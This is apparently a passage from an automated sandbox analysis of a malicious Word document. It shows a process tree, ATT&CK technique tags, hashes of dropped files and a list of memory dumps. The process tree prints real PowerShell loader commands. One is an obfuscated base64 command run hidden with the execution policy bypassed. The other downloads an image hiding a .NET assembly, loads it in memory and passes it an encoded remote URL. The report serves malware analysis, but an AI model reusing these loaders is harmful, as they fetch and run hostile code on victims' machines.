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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('hCHlRzUG','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:684
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://wallpapercave.com/uwp/uwp4098462.png';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LldBTS8yLzMwOTEvMTkuNi44OS4xNDEvLzpwdHRo' , '' , '2' , 'regasm' , '5' , 'C:\Windows\Temp\', 'htmlcento'))"
      4⤵
      Blocklisted process makes network request
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1084

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Exploitation for Client Execution

T1203

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
e5888a0a5830c589d20ed4727b14bba5

SHA1
af3db2ee8cb62f7e66dbd92c4a00d1bbe456f88a

SHA256
95050da791814101f7dd24e7ca29a1c073bbe14b7a5083dfb2b518b8a2ac1c11

SHA512
8864d34cea491b27ca5261133d30bb5fe656bb17add373049198d99c3c76db816ffbbd357a02f7efea25907d8e1d31580f560f467650f14d40f719fab7168bd8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{5A2071D2-53A3-49E3-8D31-67128D8D492C}.FSD

Filesize
128KB

MD5
8df73a1c6f17e3ece907c25d7a3ce415

SHA1
88b2cf47b2a55563a80e5d8392308c7c62d4e0bd

SHA256
66a3fd01c68f86c101bd7d347def362f4bb48fbffb14436e2cb1c592a696acc3

SHA512
daa9668bd3c787758795163803b9de3e02c80ed58b605ba54b1e357948aec3b108e2244e02af5c06e334e5d001bd956544b419558910f4fbad7bb40479afa9ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Filesize
128KB

MD5
f4715b6efda1c44f647f633d6985d587

SHA1
49ed35d5b2cea0872ad74bee3d2c53df60da79d7

SHA256
7ff3a7de7fd25647999378b429a2c029c9f3e77c34702fd716160da2705159d5

SHA512
af389694dff80877666f1f2119b57d87d05977cec548c2002991e1166fb5d42cb8caaa3d50a58d92b55a62011a0b841e082067475193074a862ddf00d23db2be

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{27A2ACF5-426E-467A-833E-7EBB0E9E1760}.FSD

Filesize
128KB

MD5
e68cd945d8d92832da6921fce730ac2e

SHA1
afa4abf6e14f7dac1787be976f7019f40c732421

SHA256
3eef4b4c888b83851b2d4a6e63da2d1e0a918fd18f9ca92c93dbcfb22ab57333

SHA512
cfdfb0d28969b448ddb6d55780892626688e48f57e451364c73057d109eb43f76d7f59c46041ddb3c22c8b7aa765db23a6f88eecc54def0d67ea54053ab35466

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HYJJYCDH\HTMLHisotoryCleaner[1].doc

Filesize
26KB

MD5
baf31ab5eb242de4b7deb9bc7864f08f

SHA1
947de3fe4047d9ed6b0f0e9999c92941610ab08c

SHA256
8266d8ebf0586f5e43faaff0ded41e5da85478b72844bbd505bf6c08a711ab22

SHA512
b8317667d9fbdc86a867c5eb09b228a96c3b9f6fa8f2ebcd042c2477fdc67946a1c642b9132db8851c71067008f07e98a5c9c7232267cda91c46c4c2d9a1f079

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF35974F.doc

Filesize
26KB

MD5
baf31ab5eb242de4b7deb9bc7864f08f

SHA1
947de3fe4047d9ed6b0f0e9999c92941610ab08c

SHA256
8266d8ebf0586f5e43faaff0ded41e5da85478b72844bbd505bf6c08a711ab22

SHA512
b8317667d9fbdc86a867c5eb09b228a96c3b9f6fa8f2ebcd042c2477fdc67946a1c642b9132db8851c71067008f07e98a5c9c7232267cda91c46c4c2d9a1f079

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab563D.tmp

Filesize
61KB

MD5
f3441b8572aae8801c04f3060b550443

SHA1
4ef0a35436125d6821831ef36c28ffaf196cda15

SHA256
6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

SHA512
5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar572A.tmp

Filesize
163KB

MD5
9441737383d21192400eca82fda910ec

SHA1
725e0d606a4fc9ba44aa8ffde65bed15e65367e4

SHA256
bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

SHA512
7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

Download Submit
C:\Users\Admin\AppData\Local\Temp\{A07B2FB9-FD0A-4797-9EED-6F6D4786D222}

Filesize
128KB

MD5
badf9caa29040722ee6bffa0f5b45746

SHA1
ecd9da2d6ab0efb3538f2a812001dc504bc83fe2

SHA256
7fe31e0ef815a61ff26b463f1f0141dbcca4dc631754a65bcca68542d43872e0

SHA512
f43a00ac2fb705e044e8f86a71c7ac867aee9980024017d4eec9403e6e07f432feb0c133e261f374ba17539196160d6ef62912b3d108248a9f3bad777f25e525

Download Submit
C:\Users\Admin\AppData\Roaming\HTMLhistoryCleaner.vbs

Filesize
137KB

MD5
329ec572360f8e6cdddd1d7304e77001

SHA1
97b65dfea9676d35d051a4378c0a6f70b607a661

SHA256
76a73ec52afc9b6ba0596388abba0ace5eb64779c0154fd976c521c470d53f14

SHA512
4b1f579de517d0729b95f55e4fc5afeec51ffa03a1771e80c59dd4efe836a8f9daa7c75416fcd41f9f33195ac0fe69ae5ae46f51ddf680c694609528abe2b0ad

Download Submit
C:\Users\Admin\AppData\Roaming\HTMLhistoryCleaner.vbs

Filesize
137KB

MD5
329ec572360f8e6cdddd1d7304e77001

SHA1
97b65dfea9676d35d051a4378c0a6f70b607a661

SHA256
76a73ec52afc9b6ba0596388abba0ace5eb64779c0154fd976c521c470d53f14

SHA512
4b1f579de517d0729b95f55e4fc5afeec51ffa03a1771e80c59dd4efe836a8f9daa7c75416fcd41f9f33195ac0fe69ae5ae46f51ddf680c694609528abe2b0ad

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
20KB

MD5
f1f58f79e124178249aa9b13477f4d9a

SHA1
572180410342995eba0fb4bcde54b4086d9da764

SHA256
dfe3a5e13d5d33344401c8d89cf2b959349557b35fbf9208c6ee009b8bd038df

SHA512
cb59a6f86190dd4b104f6fc4f06cf9617013e447bf460084b1d0187cbc6dd8a3c60fe59532c63000e81c90bb54366369c5cebe361812bfdbfc607739a85e8117

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QY9HERYPQDLRJW45UFJP.temp

Filesize
7KB

MD5
8aa2c6b9953d8de43a8ba6db13ea79dc

SHA1
1b28a423112ba622b6f78852307c32bcf9f2c18b

SHA256
564fda30cb49a4dce8739edaec8145c9058e00178d87a37696497f5e1168a4dd

SHA512
a17257d774e0e7cbdc0ce9d0d83389192b24597e7d35a25a5032931b6a28d56429d1a944a355ea6a1b42c79f8f055e28bc5bb84cf9c0b885f4a83482078b3a18

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
8aa2c6b9953d8de43a8ba6db13ea79dc

SHA1
1b28a423112ba622b6f78852307c32bcf9f2c18b

SHA256
564fda30cb49a4dce8739edaec8145c9058e00178d87a37696497f5e1168a4dd

SHA512
a17257d774e0e7cbdc0ce9d0d83389192b24597e7d35a25a5032931b6a28d56429d1a944a355ea6a1b42c79f8f055e28bc5bb84cf9c0b885f4a83482078b3a18

Download Submit
memory/684-187-0x000000006A080000-0x000000006A62B000-memory.dmp

Filesize
5.7MB

Download
memory/684-175-0x000000006A080000-0x000000006A62B000-memory.dmp

Filesize
5.7MB

Download
memory/684-176-0x000000006A080000-0x000000006A62B000-memory.dmp

Filesize
5.7MB

Download
memory/684-177-0x00000000024A0000-0x00000000024E0000-memory.dmp

Filesize
256KB

Download
memory/1084-186-0x000000006A080000-0x000000006A62B000-memory.dmp

Filesize
5.7MB

Download
memory/1084-185-0x000000006A080000-0x000000006A62B000-memory.dmp

Filesize
5.7MB

Download
memory/1084-184-0x000000006A080000-0x000000006A62B000-memory.dmp

Filesize
5.7MB

Download
memory/2560-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2560-174-0x000000007228D000-0x0000000072298000-memory.dmp

Filesize
44KB

Download
memory/2560-9-0x00000000023B0000-0x00000000023B2000-memory.dmp

Filesize
8KB

Download
memory/2560-1-0x000000007228D000-0x0000000072298000-memory.dmp

Filesize
44KB

Download
memory/2560-216-0x000000007228D000-0x0000000072298000-memory.dmp

Filesize
44KB

Download
memory/2724-178-0x000000007228D000-0x0000000072298000-memory.dmp

Filesize
44KB

Download
memory/2724-4-0x000000002FC71000-0x000000002FC72000-memory.dmp

Filesize
4KB

Download
memory/2724-6-0x000000007228D000-0x0000000072298000-memory.dmp

Filesize
44KB

Download
memory/2724-8-0x0000000002D40000-0x0000000002D42000-memory.dmp

Filesize
8KB

Download
memory/2724-209-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2724-211-0x000000007228D000-0x0000000072298000-memory.dmp

Filesize
44KB

Download